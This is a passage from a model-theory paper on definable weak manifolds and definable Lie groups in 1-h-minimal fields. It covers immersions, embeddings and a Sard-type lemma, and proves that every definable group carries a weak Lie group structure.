left translation \(L_{h}:G\to G\) is a definable homeomorphism, that sends \(e\) to \(h\) and satisfies \(L_{h}(H)=H\), so \(\dim_{e}(H)=\dim_{h}(H)\). **Proposition 5.9**.: _Suppose \(T\subset K^{m}\) is such that there is a coordinate projection \(\pi:T\to U\) onto an open subset \(U\subset K^{n}\) and such that the fibres of \(\pi\) are finite of constant cardinality, \(s\). Assume the associated map \(f:U\to(K^{m-n})^{[s]}\) is continuous. Then \(T\to K^{n}\) is etale._ Proof.: Let \(x\in T\). Replacing \(U\) by a smaller neighborhood around \(\pi(x)\) we may assume, using Fact 2.13, that \(f\) lifts to a continuous function \(g:U\to(K^{m-n})^{s}\), \(g=(g_{1},\cdots,g_{s})\). In this case one gets that \(T\) is homeomorphic to \(\bigsqcup_{i=1}^{s}U\) over \(U\), via the map \((a,i)\mapsto(a,g_{i}(a))\). **Lemma 5.10**.: _Suppose \(M=\bigcup_{i=1}^{r}\varphi_{i}(U_{i})\) where \(\varphi_{i}:U_{i}\to M\) are definable functions, such that the \(U_{i}\) are definable (weak) \(\mathcal{P}\)-\(n\)-manifolds. Suppose further that for all \(i,j\) the sets \(U_{ij}:=\varphi_{i}^{-1}(\varphi_{j}(U_{j}))\) are open in \(U_{i}\), and the transition maps \(U_{ij}\to U_{ji}\) given by \(x\mapsto\varphi_{j}^{-1}\varphi_{i}(x)\) are \(\mathcal{P}\)-maps Then \(M\) has a unique structure of a definable (weak) \(\mathcal{P}\)-\(n\)-manifold such that \(\varphi_{i}:U_{i}\to M\) is an open immersion._ The proof is straightforward and omitted. **Proposition 5.11**.: _Suppose \(M\) is a definable weak topological manifold, then \(X\subset M\) is large if and only if the interior of \(X\) in \(M\) is dense in \(M\)._ Proof.: Because the dimension of \(M\setminus X\) is the maximum of the local dimension at its points by Lemma 5.8, we conclude that both conditions are local, and so we may assume \(M=U\subset K^{n}\) is open. Here the result follows from dimension theory. **Proposition 5.12**.: _Suppose \(M\) is a weak definable topological manifold. Suppose \(X\subset M\) is definable. Then \(X\) is a finite union of locally closed definable subsets of \(M\)._ Proof.: There is an immediate reduction to the case where \(M=U\to K^{n}\) is etale. In this case \(U\) has the subspace topology \(U\subset K^{s}\) for some \(s\). So it is enough to prove this for \(X\subset K^{s}\). This is a consequence of Proposition 2.17. In case \(\operatorname{acl}=\operatorname{dcl}\) a weak manifold is generically a manifold: **Proposition 5.13**.: _Suppose \(\operatorname{acl}=\operatorname{dcl}\)._ _If \(M\) is a definable weak \(\mathcal{P}\)-manifold, then there is a definable open dense subset \(U\subset M\) which is a definable \(\mathcal{P}\)-manifold._ Proof.: There is an immediate reduction to the case in which \(i:M=U\to K^{n}\) is etale. Let \(r\) be an uniform bound for the cardinality of the fibers of \(U\). In this case if we denote \(X_{k}\subset K^{n}\) the set of points \(x\) such that \(i^{-1}(x)\) has cardinality \(x\), and \(U_{k}\subset X_{k}\) is the interior of \(X_{k}\), then \(\bigcup_{k\leq r}U_{k}\) is open dense in in \(K^{n}\). Replacing \(U\) with \(i^{-1}(U_{k})\) we may assume that the nonempty fibers of \(i\) have constant cardinality. From the assumption \(\operatorname{acl}=\operatorname{dcl}\) we conclude that the map \(i(U)\to(K^{r})^{[s]}\) lifts to a definable map \(i(U)\to(K^{r})^{s}\). There is an open dense subset \(V^{\prime}\subset i(U)\) such that \(V^{\prime}\to i(U)\to(K^{r})^{s}\) is a \(\mathcal{P}\)-map, see Proposition 5.6, and we conclude that \(i^{-1}(V^{\prime})\cong\bigsqcup_{i=1}^{s}V^{\prime}\) over \(V^{\prime}\), which is clearly a \(\mathcal{P}\)-manifold. It seems possible that in this situation a weak manifold is already a manifold, but we do not need this so we do not try to prove it. The next couple of results are not used in the main theorems, but may be of independent interest. **Definition 5.14**.: Suppose \(M\) and \(N\) are definable strictly differentiable weak manifolds, and \(f:M\to N\) a definable strictly differentiable function. Then \(f\) is called an immersion if the derivative \(f^{\prime}(x)\) is injective at all points \(x\in M\). \(f\) is called an embedding if \(f\) is an immersion and a homeomorphism onto its image. \(f\) is called a submersion if the derivative \(f^{\prime}(x)\) is surjective for all \(x\in M\). These notions have the expected properties. **Proposition 5.15**.: _Suppose \(f:M\to N\) is a strictly differentiable definable map of strictly differentiable definable weak manifolds. If \(f\) is an immersion then \(M\) satisfies the following universal property: For every strictly differentiable weak definable manifold \(P\), and \(g:P\to M\), the function \(g\) is strictly differentiable and definable if and only is \(fg\) is strictly differentiable and \(g\) is definable and continuous._ _If \(f\) is an embedding and \(g:P\to M\) is as above, then \(g\) is a strictly differentiable definable map if and only if \(fg\) is a strictly differentiable definable map._ **Proposition 5.16**.: _If \(f:M\to N\) is a surjective submersion, then a map \(g:N\to K\) is a strictly differentiable definable function if and only if the composition \(gf\) is strictly differentiable and definable._ These two properties are a consequence of the theorems on the local structure of immersions and submersions, Propositions 4.9 and 4.10. We leave the details for the interested reader to fill. Suppose \(M\) is a definable strictly differentiable weak manifold. If \(M\to N\) is a surjective map of sets, it determines at most one structure of a definable strictly differentiable weak manifold on \(N\), in such a way that \(M\to N\) is a submersion. Also, an injective map \(N\to M\) determines at most one structure of a strictly differentiable weak manifold on \(N\), in such a way that \(N\to M\) is an embedding. The subsets \(N\subset M\) admitting such a structure are called submanifolds of \(M\). We also get that if \(N\) is a definable topological space, and \(N\to M\) is a definable and continuous function, then there is at most one structure of a strictly differentiable definable manifold on \(N\) extending the given topology, and for which \(N\to M\) is an immersion. In other words the strictly differentiable weak manifold structure that makes \(N\to M\) an embedding is determined by the set \(N\), and the strictly differentiable weak manifold structure that makes \(N\to M\) an immersion is determined by the topological space \(N\). **Proposition 5.17**.: _Suppose \(M,N\) are definable strictly differentiable weak manifolds, and let \(f:M\to N\) be an injective definable map. Then there is a definable open dense subset \(U\subset M\) such that \(f|_{U}\) is an immersion._ Proof.: By Proposition 5.7 we may assume \(f\) is strictly differentiable. We have to show that the interior of the set \(\{x\in M:f^{\prime}(x)\text{ is injective}\}\) is dense in \(M\). If this is not the case, we can find an open nonempty subset of \(M\) such that \(f\) is not an immersion at any point. So suppose \(M\) is an open subset of \(K^{n}\), \(N\) is an open subset of \(K^{m}\) and \(f\) is not an immersion at any point. For dimension reasons \(n\leq m\). If we define \(X_{k}\) to be the set of points \(x\) of \(M\) such that \(f^{\prime}(x)\) is of rank \(k\) then \(X_{0}\cup\cdots\cup X_{n-1}=M\), and so if \(U_{r}\) is the interior of \(X_{r}\) we have that \(U_{1}\cup\cdots\cup U_{n-1}\) is open dense in \(M\). So we may assume that \(f\) is of constant rank. This contradicts the result in Proposition 4.11, since the map \((x,y)\mapsto(x,0)\) is not injective. The following facts are standard, and are probably known: **Fact 5.18**.: _Suppose \(X\) is a Hausdorff space and \(X\to Y\) is a surjective continuous map, which is a local homemorphism with fibers of constant cardinality \(s\). Then the map \(t:Y\to X^{[s]}\) given by the fibers of \(p\), is continuous._ Proof.: Let \(\pi:X^{s}\setminus\Delta\to X^{[s]}\) be the canonical projection. Take \(y\in Y\) and \(\{x_{1},\ldots,x_{s}\}=p^{-1}(y)=t(y)\). A basic open neighborhood of \(t(y)\) is of the form \(\pi(U_{1}\times\cdots\times U_{s})\) for \(x_{k}\in U_{k}\) open and \(U_{k}\) pairwise disjoint. Shrinking \(U_{k}\) we may assume \(p|_{U_{k}}\) is a homemorphism onto an open set. If \(V=\bigcap_{k}p(U_{k})\), then \(t^{-1}(V)\subset\pi(U_{1}\times\cdots\times U_{s})\). **Fact 5.19**.: _Let \(X,Y,Z\) be topological spaces, \(p:X\to Z\), \(q:Y\to Z\) be surjective continuous functions and \(f:X\to Y\) a continuous bijection such that \(qf=p\). Assume that \(X\) and \(Y\) are Hausdorff spaces, and \(p:X\to Z\) has finite fibers of constant cardinality, \(s\). If the map \(t:Z\to X^{[s]}\), given by \(x\mapsto p^{-1}(x)\) is continuous then \(f\) is a homeomorphism._ Proof.: Since \(f\) is continuous and bijective, we only need to show that it is open, which is a local property. Fix some \(x\in X\) and \(z=p(z)\). By Fact 2.13 the map \(Z\to X^{[s]}\) lifts, locally near \(z\), to a continuous map \((l_{1},\ldots,l_{s}):Z\to X^{s}\). Shrinking \(Z\) to this neighborhood, and reducing \(X\) and \(Y\) accordingly, we may assume that \(X\) is homeomorphic to \(\bigsqcup_{i\leq s}Z\) over \(Z\), via the homeomorphism \(F_{l}:\bigsqcup_{i\leq s}Z\to X\), given by \((i,z)\mapsto l_{i}(z)\). To see that this is a homeomorphism, note that the image of the \(i\)-th-cofactor via \(F_{l}\) is the set \(X_{i}=\{x\in X\mid x=l_{i}p(x)\}\), which is closed in \(X\) (because \(X\) is Hausdorff). Since there are only finitely many \(X_{i}\) (and they are pairwise disjoint) they are also open. Finally, the inverse of \(F_{l}\) restricted to \(X_{i}\) coincides with \(p\) which is continuous. So \(f\) restricted to \(F_{l}(Z)\) is a homeomorphism, so \(f\) is open at \(x\). Since \(x\) was arbitrary, the conclusion follows. Similarly, we have a homeomorphism \(F_{fl}:\bigsqcup_{i\leq s}Z\to Y\), which is compatible with \(f\) in the sense that \(fF_{l}=F_{fl}\). **Proposition 5.20**.: _Let \(M,N\) be strictly differentiable weak manifolds, and \(f:M\to N\) be an injective definable function. Then there is a dense open \(U\subset M\) such that \(f|_{U}\) is an embedding._ Proof.: By Proposition 5.17 we may assume that \(f\) is an immersion. If \(V_{1},\ldots,V_{n}\) is a finite open cover of \(N\) and the statement is valid for \(f:f^{-1}V_{i}\to V_{i}\), then it is also valid for \(f\). So we may assume \(N=V\to K^{m}\) is etale. From the definition we have that \(V\subset K^{d}\) has the subspace topology. We have already seen that \(f:M\to V\) is an immersion, so if it is a topological embedding into \(K^{d}\), then it is an embedding into \(V\). So we may assume \(N=K^{m}\). Now consider \(U_{1}\cup\cdots\cup U_{n}=M\) a finite open cover of \(M\). Assume \(f|_{U_{i}}\) is an embedding. Define \(U^{\prime}_{i}=\text{Int}(U_{i}\setminus\bigcup_{j<i}U_{i})\), and \(U^{\prime\prime}_{i}=U^{\prime}_{i}\setminus\bigcup_{j\neq i}f^{-1}\operatorname {cl}(f(U^{\prime}_{j}))\). Note that \(\bigcup_{i}U^{\prime}_{i}\subset M\) is an open dense set. Also, note that \(f(U^{\prime}_{i}\setminus U^{\prime\prime}_{i})=\bigcup_{j\neq i}f(U^{\prime} _{i})\cap\operatorname{cl}(f(U^{\prime}_{j}))\subset\bigcup_{j\neq i} \operatorname{cl}(f(U^{\prime}_{j}))\setminus f(U^{\prime}_{j})\). So we conclude that \(\dim(U^{\prime}_{i}\setminus U^{\prime\prime}_{i})<\dim(M)\), by Proposition 2.18. Thus, replacing \(U_{i}\) with \(U^{\prime\prime}_{i}\) we may assume \(\operatorname{cl}(f(U_{i}))\cap f(U_{j})=\emptyset\) for distinct \(i,j\). In this case one verifies that \(f\) is a topological embedding. We are thus reduced to the case where \(M=U\to K^{n}\) is etale. Consider for each \(I\subset\{1,\ldots,m\}\) of size \(n\), the set \(A_{I}\) of \(x\in U\) such that the \(I\)-th-minor of \(f^{\prime}(x)\) is invertible. As \(U=\bigcup_{I}A_{I}\) we conclude that \(U^{\prime}=\bigcup_{I}\text{Int}(A_{I})\) is open dense in \(U\), so by the reduction in the previous paragraph we may assume that the composition of \(f:U\to K^{m}\) with the projection onto the first \(n\) coordinates \(p:K^{m}\to K^{n}\) is an etale immersion. If \(s\) is a uniform bound for the size of the fibers of \(U\) over \(K^{n}\), then we can take \(A_{k}\) the set of \(x\in K^{m}\) such that the fiber \((pf)^{-1}(x)\) has \(k\) elements, and consider \(U^{\prime}=\bigcup_{k\leq s}\text{Int}(A_{k})\). So we may assume that if \(V=pf(U)\), the fibers of \(U\) over \(V\) have the same size \(s\). In this case the function \(V\to U^{[s]}\), given by \(x\mapsto(pf)^{-1}(x)\), is continuous, and the function \(f\) is topological homeomorphism \(U\to f(U)\), see Facts 5.18 and 5.19. We can now prove a \(1\)-h-minimal version of Sard's Lemma (compare with [16, Theorem 2.7] for an analogous result in the o-minimal setting). Namely, given a definable strictly differentiable morphism, \(f\), of definable weak manifolds, call a value \(x\) of \(f\) regular when \(f\) is a submersion at every point of \(f^{-1}(x)\). The statement is, then, that the set of singular values is small: **Proposition 5.21**.: _Suppose \(M\) and \(N\) are definable strictly differentiable weak manifolds. If \(f:M\to N\) is a strictly differentiable map, then there exists an open dense subset \(U\subset N\) such that \(f:f^{-1}(U)\to U\) is a submersion._ Proof.: We have to see that the image via \(f\) of the set of points \(x\in M\) such that \(f^{\prime}(x)\) is not surjective, is nowhere dense in \(N\). This property is expressible by a first order formula, so we may assume that \(\operatorname{acl}=\operatorname{dcl}\), see Fact 2.5 and the subsequent remark. Let \(m=\dim(N)\). Let \(X\subset M\) a definable set such that for all \(x\in X\), \(f^{\prime}(x)\) is not surjective. We have to see that \(\dim f(X)<m\). We do this by induction on the dimension of \(X\). The base case, when \(X\) is finite, is trivial. The dimension of \(f(X)\) is the maximum of the local dimensions at points, see Proposition 5.8. So we may assume \(N\subset K^{m}\) is open. Covering \(M\) by a finite number of charts we may assume \(M\to K^{n}\) is etale, say \(M\subset K^{r}\). Then by Proposition 2.15 there exists a finite partition of \(X\) into definable sets such that if \(X^{\prime}\) is an element of the partition, there exists a coordinate projection \(p:K^{r}\to K^{l}\), which restricted to \(X^{\prime}\) is a surjection \(X^{\prime}\to U\) onto an open subset \(U\subset K^{l}\) with finite fibers of constant cardinality. If we prove that \(\dim f(X^{\prime})<m\) for every element \(X^{\prime}\) of the partition then also \(\dim f(X)<m\). So we may assume there is a coordinate projection \(p:X\to U\) onto an open subset \(U\subset K^{l}\), such that \(p^{-1}(u)\) has \(t\) elements for all \(u\in U\). From the assumption \(\operatorname{acl}=\operatorname{dcl}\), we get that there are definable sections \(s_{1},\dots,s_{t}:U\to X\), such that \(\{s_{1}(u),\cdots,s_{t}(u)\}=p^{-1}(u)\), for all \(u\in U\). As \(X=\bigcup_{i\leq t}s_{i}(U)\), we may assume \(p:X\to U\) is a bijection with inverse \(s:U\to X\). The map \(s:U\to M\) becomes strictly differentiable in an open dense \(V\subset U\), see Proposition 5.7. As \(s(U\setminus V)\) has smaller dimension than \(X\), we may assume that \(s\) is strictly differentiable. Now note that \(s\) has image in \(X\) and so the composition \(U\to M\to N\) has derivative which is not surjective at any point of \(U\). So we have reduced to the case in which \(M=U\subset K^{n}\) is open and \(X=U\). If we consider \(A_{k}\subset U\), the set defined by \(A_{k}=\{x\in U:f^{\prime}(x)\text{ has rank }k\}\), then \(\bigcup_{k<m}A_{k}=U\) and so \(\bigcup_{k<m}\text{Int}(A_{k})\) is open and dense in \(U\). We conclude by the induction hypothesis that the image of \(U\setminus\bigcup_{k<m}\text{Int}(A_{k})\) is nowhere dense in \(N\), and so we may assume that \(f^{\prime}(x)\) has constant rank \(k\) in \(U\), for a \(k<m\). Consider the set \(Y=\{x\in U:\dim f^{-1}f(x)\geq\dim(U)-k\}\). Then \(Y\) is definable, because dimension is definable in definable families. Also, \(Y\) has dense interior by the constant rank theorem Proposition 4.11. So once more by the induction hypothesis we may assume \(f^{-1}f(x)\) has dimension at least \(\dim(U)-k\) for all \(x\in U\). Then the dimension of \(f(U)\) is at most \(k\), by the additivity of dimension. If \(M\to N\) is a map of strictly differentiable weak manifolds, and \(y\in N\) is a regular value, then one can show \(f^{-1}(y)\subset M\) is a strictly differentiable weak submanifold. ## 6. Definable Lie groups In this section we show that every definable group is a definable weak Lie group and that the germ of a definable weak Lie group morphism is determined by its derivative at the identity. The proof of the following lemma was communicated to us by Martin Hils. **Lemma 6.1**.: _Suppose \(G\) is a group \(a\)-definable in a pregeometric theory, and that \(X,Y\subset G\) are non-empty \(a\)-definable sets of dimension smaller than \(G\). If \(g\in G\) is such that \(\dim(gX\cap Y)=\dim(X)\), then \(\dim(g/a)\leq\dim(Y)\)._ _In particular, there exists \(g\in G\) such that \(\dim(gX\cap Y)<\dim(X)\)_ Proof.: Denote \(d=\dim(X)\) and \(d^{\prime}=\dim(Y)\). Suppose \(\dim(gX\cap Y)=d\). Note that \(d\leq d^{\prime}\). Let \(h^{\prime}\in gX\cap Y\) be such that \(\dim(h^{\prime}/ag)=d\). Let \(h=g^{-1}h^{\prime}\). As \(h\in X\) we have \(d\geq\dim(h/a)\geq\dim(h/ag)=\dim(h^{\prime}/ag)=d\). The first inequality is because \(h\in X\), the third one because \(h\) and \(h^{\prime}\) are inter-definable over \(ag\), and the fourth one by choice of \(h^{\prime}\). We conclude that \(h\) and \(g\) are algebraically independent over \(a\). Then we obtain that \(d^{\prime}\geq\dim(h^{\prime}/a)\geq\dim(h^{\prime}/ah)=\dim(g/ah)=\dim(g/a)\). The first inequality because \(h^{\prime}\in Y\), the third equality because \(h^{\prime}\) and \(g\) are inter-definable over \(ah\), and the fourth equality because \(h\) and \(g\) are algebraically independent over \(a\). For the second statement, note that if \(g\in G\) is such that \(\dim(g/a)=\dim(G)\), or more generally \(\dim(g/a)>d^{\prime}\), then \(\dim(gX\cap Y)<\dim(Y)\). The next lemma generalizes Lemma 2.4 of [11] for o-minimal theories. Pillay's proof can be seen to generalize, with some effort, to geometric theories. We give a different proof: **Lemma 6.2**.: _Suppose, \(G\) is a group definable in a pregeometric theory and suppose \(X\subset G\) is such that \(\dim(G\setminus X)<\dim(G)\). Then a finite number of translates of \(X\) cover \(G\)._ Proof.: Suppose we have \(g_{0},\cdots,g_{n}\in G\) such that \(\dim(G\setminus(\bigcup_{k}g_{k}X))=m\). By the Lemma 6.1 applied to \(G\setminus X\) and \(G\setminus(\bigcup_{k}g_{k}X)\) we get that there is \(g_{n+1}\in G\) such that \(\dim(G\setminus\bigcup_{k\leq(n+1)}g_{k}X)<m\), which finishes the proof. **Lemma 6.3**.: _Suppose \(G\) is a definable group in a pregeometric theory and \(V\subset G\) is large. Then every \(g\in G\) is a product of two elements in \(V\)._ Proof.: The proof of [11, Lemma 2.1] works: if we take \(h\in G\) generic over \(g\), then \(h^{-1}g\) is also generic over \(g\), and so \(h,h^{-1}g\in V\) and their product is \(g\). **Proposition 6.4**.: _A definable group can be given the structure of a definable strictly differentiable weak \(T_{k}\)-Lie group. The forgetful functor from definable strictly differentiable weak Lie groups to definable groups is an equivalence of categories._ _If \(\operatorname{acl}=\operatorname{dcl}\) the forgetful functor from definable strictly differentiable \(T_{k}\)-Lie groups to definable groups is an equivalence of categories._ Proof.: That the forgetful functor is full follows from Proposition 5.7. Indeed, suppose \(G\) and \(H\) are strictly differentiable or \(T_{k}\)-Lie groups, and let \(f:G\to H\) be a definable group morphism. Then by Proposition 5.7 there is an open dense \(U\subset G\) such that \(f:U\to H\) is strictly differentiable or \(T_{k}\). If \(g_{0}\in U\) is arbitrary, and \(g\in G\), consider the formula \(f=L_{f(g)f(g_{0})^{-1}}fL_{g_{0}g^{-1}}\), where we are denoting \(L_{h}\) the left translate by \(h\). Now, \(L_{g_{0}g^{-1}}\) is a strict diffeomorphism or \(T_{k}\)-isomorphism which sends \(g\) to \(g_{0}\), and \(L_{f(g)f(g_{0})^{-1}}\) is a strict diffeomorphism or \(T_{k}\)-isomorphism. We conclude that \(f\) being strictly differentiable or \(T_{k}\) at \(g_{0}\) implies that \(f\) is strictly differentiable of \(T_{k}\) at \(g\). To see that the forgetful functor is essentially surjective one follows the proof of [11, Proposition 2.5]. Namely, let \(G\) be of dimension \(n\). Decompose \(G\) as in Proposition 2.15, and let \(V_{0}\subset G\) be the union of the \(n\)-dimensional pieces \(U_{0},\cdots,U_{r}\). Give \(V_{0}\) the structure of a weak strictly differentiable manifold with charts the inclusions \(U_{i}\to V_{0}\), see Proposition 5.9. Note that \(V_{0}^{-1}\subset G\) is large in \(G\), as the inverse function is a definable bijection sending the large subset \(V_{0}\) onto \(V_{0}^{-1}\). As the intersection of two large sets is large, we conclude that \(V_{0}\cap V_{0}^{-1}\) is large in \(G\). A fortiori, \(V_{0}\cap V_{0}^{-1}\) is large in \(V_{0}\) and so it contains an open dense subset of \(V_{0}\), see Proposition 5.11. Let \(V_{1}\subset V_{0}\cap V_{0}^{-1}\) be open dense in \(V_{0}\) such that the inverse function on \(V_{1}\) (and into \(V_{0}\)) is strictly differentiable and \(T_{k}\), see Proposition 5.7. In a similar way, we have that \(V_{0}\times V_{0}\cap m^{-1}(V_{0})\) is large in \(G\times G\) Indeed, \(m^{-1}(V_{0})\) is the inverse image of the large subset \(G\times V_{0}\) of \(G\times G\) under the definable bijection \((\operatorname{Id},m):G\times G\to G\times G\). In the same way as before, we find \(Y_{0}\subset V_{0}\times V_{0}\cap m^{-1}(V_{0})\) open and dense in \(V_{0}\times V_{0}\) such that the multiplication map \(Y_{0}\to V_{0}\) is strictly differentiable and \(T_{k}\). Now we take \[V_{1}^{\prime}=\{g\in V_{1}:(h,g),(h^{-1},hg)\in Y_{0}\text{ for all }h\text{ generic over }g\}.\] Note that \(V_{1}^{\prime}\) is definable, because \(g\in V_{1}^{\prime}\) is equivalent to \(\dim(G\setminus X_{g})<n\) for \(X_{g}=\{h\in G:(h,g),(h^{-1},hg)\in Y_{0}\}\), and dimension is definable in definable families in geometric theories. Note also that \(V_{1}^{\prime}\) is large in \(G\), because if \(g\in G\) is generic and \(h\in G\) is generic over \(g\), then \((h,g)\) is generic in \(G\times G\), and \((h^{-1},hg)\), being the image of a definable bijection at \((h,g)\) is also generic in \(G\times G\), so they belong to \(Y_{0}\), because \(Y_{0}\) is large in \(G\times G\). Now take \(V_{2}\) the interior of \(V_{1}^{\prime}\) in \(V_{0}\) and \(V=V_{2}\cap V_{2}^{-1}\). Then \(V_{2}\) is large in \(V_{0}\) by Proposition 5.11, and so it is also large in \(G\). So we conclude that \(V\) is an open dense subset of \(V_{0}\). Define also \(Y=\{(g,h):g,h,gh\in V,(g,h)\in Y_{0}\}\), then \(Y\) is open dense in \(V_{0}\times V_{0}\). This is because \(Y\) is large in \(G\times G\), with arguments as above, and it is open in \(Y_{0}\), because multiplication is continuous in \(Y_{0}\). Then we have shown: 1. \(V\) is large in \(G\). 2. \(Y\) is dense open subset of \(V\times V\), and multiplication \(Y\to V\) is strictly differentiable and \(T_{k}\). 3. Inversion is a strictly differentiable \(T_{k}\)-map from \(V\) onto \(V\). 4. If \(g\in V\) and \(h\in G\) is generic in \(G\) over \(g\) then \((h,g),(h^{-1},hg)\in Y\) For the last item, note that \(h,hg,h^{-1}\in G\) are generic, and so they belong to \(V\). Also, because \(g\in V_{1}^{\prime}\), one has that \((h,g),(h^{-1},hg)\in Y_{0}\). From this one gets 1. For every \(g,h\in G\) the set \(Z=\{x\in V:gxh\in V\}\) is open and \(Z\to V\) given by \(x\mapsto gxh\) is strictly differentiable and \(T_{k}\). 2. For every \(g,h\in G\), the set \(W=\{(x,y)\in V\times V:gxhy\in V\}\) is open in \(V\times V\) and the map \(W\to V\) given by \((x,y)\mapsto gxhy\) is strictly differentiable and \(T_{k}\). Indeed, for (a), assume \(x_{0}\in Z\), take \(h_{1}\) generic over \(h\) and \(k\) generic over \(g,x,h,h_{1}\). Take \(h_{2}=h_{1}^{-1}h\). Note that \(h_{1},h_{2}\in V\). Now one writes \(f(x)=gxh\) as a composition of strictly differentiable and \(T_{k}\) functions defined on an open neighborhood of \(x_{0}\) in the following way. Consider the set \(Z_{1}=\{x\in V:(kg,x)\in Y,(kgx,h_{1})\in Y,(kgxh_{1},h_{2})\in Y,(k^{-1},kgxh) \in Y\}\), then by item 2 we have that \(Z_{1}\) is open and the map \(x\mapsto gxh=k^{-1}(((kgx)h_{1})h_{2})\) is a composition of strictly differentiable and \(T_{k}\) functions. Also \(x_{0}\in Z_{1}\) by item 4. Similarly for (b) given \((x_{0},y_{0})\in W\) the set \[W_{1}=\{(x,y)\in V:(kg,x),(kgx,h_{1}),(kgxh_{1},h_{2}),(kgxh,y),(k^{-1},kgxhy) \in Y\}\] is open by item (3), contains \((x_{0},y_{0})\) by item (4) and in \(W_{1}\) the required map is a composition of strictly differentiable and \(T_{k}\) functions. By (1) above and Lemma 6.2 a finite number of translates, \(g_{0}V,\ldots,g_{n}V\), cover \(G\). Consider the maps \(\varphi_{i}:V\to G\) given by \(\varphi_{i}(x)=g_{i}x\). It is straightforward to verify, using (a), (b) and (3) above that these charts endow \(G\) with a (unique) structure of a strictly differentiable or \(T_{k}\) manifold, as in Lemma 5.10, and with this structure \(G\) is a Lie group. For example, to see that the transition maps are strictly differentiable or \(T_{k}\), we have to see that the sets \(V\cap g_{i}^{-1}g_{j}V\) are open, and the maps \(\varphi_{i,j}:V\cap g_{i}^{-1}g_{j}V\to V\cap g_{j}^{-1}g_{i}V\) given by \(x\mapsto g_{j}^{-1}g_{i}x\) are strictly differentiable or \(T_{k}\). This is a particular case of (a). Similarly, (b) translates into the multiplication being strictly differentiable or \(T_{k}\) and (a) and (3) translate into the inversion being strictly differentiable and \(T_{k}\). When \(\operatorname{acl}=\operatorname{dcl}\) an appropriate version of cell decomposition in Proposition 2.15 gives the result by repeating the above proof. Alternatively, we can see it directly from the result we have just proved and Proposition 5.13 and Lemma 6.2 (and the appropriate version of the Lemma 5.10). Indeed, if \(G\) is a definable group in a 1-h-minimal field with \(\operatorname{acl}=\operatorname{dcl}\), then \(G\) has the structure of a weak strictly differentiable or \(T_{k}\)-Lie group. By Proposition 5.13 there is an open dense \(U\subset G\) such that \(U\) is a strictly differentiable or \(T_{k}\)-manifold. By Proposition 5.11 and Lemma 6.2 a finite number of translates of \(U\) cover \(G\), \(g_{1}U\cup\cdots\cup g_{n}U=G\). Then the functions \(\varphi_{i}:U\to G\) given by \(x\mapsto g_{i}x\) form a gluing data for \(G\) which makes it a strictly differentiable or \(T_{k}\)-Lie group. As the previous result implies that every definable group \(G\) admits a structure of a definable weak Lie group which is unique up to a unique isomorphism, whenever we mention a property of the weak Lie group structure we understand it with respect to this structure. **Definition 6.5**.: A definable strictly differentiable local Lie group is given by a definable open set containing a distinguished point \(e\in U\subset K^{n}\), a definable open subset \(e\in U_{1}\subset U\), and definable strictly differentiable maps \(U_{1}\times U_{1}\to U\) denoted as \((a,b)\mapsto a\cdot b\) and \(U_{1}\to U\) denoted as \(a\mapsto a^{-1}\), such that there exists \(e\in U_{2}\subset U_{1}\) definable open such that * \(a\cdot e=e\cdot a=a\) for \(a\in U_{2}\). * If \(a,b,c\in U_{2}\) then \(a\cdot b\in U_{1},b\cdot c\in U_{1}\) and \((a\cdot b)\cdot c=a\cdot(b\cdot c)\). * If \(a\in U_{2}\) then \(a^{-1}\in U_{1}\) and \(a\cdot a^{-1}=a^{-1}\cdot a=e\). Given two definable strictly differentiable local Lie groups, \(U\) and \(V\), a definable strictly differentiable local Lie group morphism is given by a definable strictly differentiable map \(f:U^{\prime}\to V_{1}\) for a \(e\in U^{\prime}\subset U_{1}\) open, with \(U_{1}\) and \(V_{1}\) as in the above definition, and such that \(f(e)=e\), \(f(a\cdot b)=f(a)\cdot f(b)\) and \(f(a^{-1})=f(a)^{-1}\) for \(a\in U^{\prime}\). Also two such maps \(f_{1}\) and \(f_{2}\) are identified as morphisms if they have the same germ around \(0\), in other words, if there is a definable open neighborhood of the identity \(W\subset\operatorname{dom}(f_{1})\cap\operatorname{dom}(f_{2})\) such that \(f_{1}|_{W}=f_{2}|_{W}\). It is common to only consider local groups where \(e=0\), and translating we see that every local group is isomorphic to one with this condition. In this case we denote the distinguished element by \(e\) whenever we emphasize its role as a local group identity. We will usually identify a local group with its germ at \(e\). In those terms, the prototypical example of a local Lie group is the germ around the identity of a Lie group. The following fact is a well known application of the chain rule. We give the short proof for completeness: **Fact 6.6**.: _Suppose \(U\) is a local definable strictly differentiable Lie group. Then the multiplication map \(m:U_{1}\times U_{1}\to U_{0}\) has derivative the \(m^{\prime}(0)(u,v)=u+v\). The inverse \(i:U_{1}\to U_{0}\) has derivative \(i^{\prime}(0)(x)=-x\). The \(n\)-power \(p_{n}:U_{n}\to U_{0}\) has derivative \(p_{n}^{\prime}(0)(x)=nx\)_ Proof.: The formula for \(m^{\prime}(0)\) follows formally from the equations \(m(x,0)=x,m(0,y)=y\). Indeed if \(m(x,y)=ax+by+o(x,y)\), then plugging \(y=0\) we obtain \(a=1\) and plugging \(x=0\) we obtain \(b=1\). Here we are using the small \(o\) notation, \(f=o(x,y)\), meaning that for all \(\epsilon>0\) there is an \(r\) such that if \(|(x,y)|<r\) then \(|f(x,y)|\leq\epsilon|(x,y)|\), and we are using the uniqueness of derivatives for the strictly differentiable functions \(m(x,0)\) and \(m(0,y)\). From this the formula for \(i^{\prime}(0)\) follows from \(m(x,i(x))=0\) and the chain rule. The formula for \(p_{n}\) follows inductively from the chain rule and \(p_{n}(x)=m(p_{n-1}(x),x)\). We give some results on subgroups and quotient groups These are not needed for the main applications. **Proposition 6.7**.: _Suppose \(f:G\to H\) is a surjective definable group morphism. Then \(f\) is a submersion._ Proof.: This is a consequence of Sard's Lemma, Proposition 5.21. **Fact 6.8**.: _Suppose \(X\) is a topological space and \(Y\subset X\) is a finite union of locally closed subsets of \(X\). Then every open nonempty subset of \(X\) contains an open nonempty subset which is disjoint from \(Y\) or contained in \(Y\)._ Proof.: The property mentioned is closed under Boolean combinations and is true for open subsets. **Proposition 6.9**.: _Suppose \(G\) is a definable group and \(H\subset G\) is a definable subgroup. Then \(H\) is closed in \(G\)._ Proof.: Recall that \(H\) is a finite union of locally closed subsets of \(G\), see for instance Proposition 5.12. So by applying Fact 6.8 to \(H\subset\bar{H}\), we conclude that \(H\) has nonempty relative interior in \(\bar{H}\). As \(H\) is a subgroup we conclude by translation that \(H\) is open in \(\bar{H}\). An open subgroup is the complement of some of its translates, so it is also closed. We conclude that \(H=\bar{H}\) is closed. **Proposition 6.10**.: _Suppose \(H\subset G\) is a subgroup of \(G\). Then with the structure of weak definable strictly differentiable manifolds on \(G\) and \(H\), the 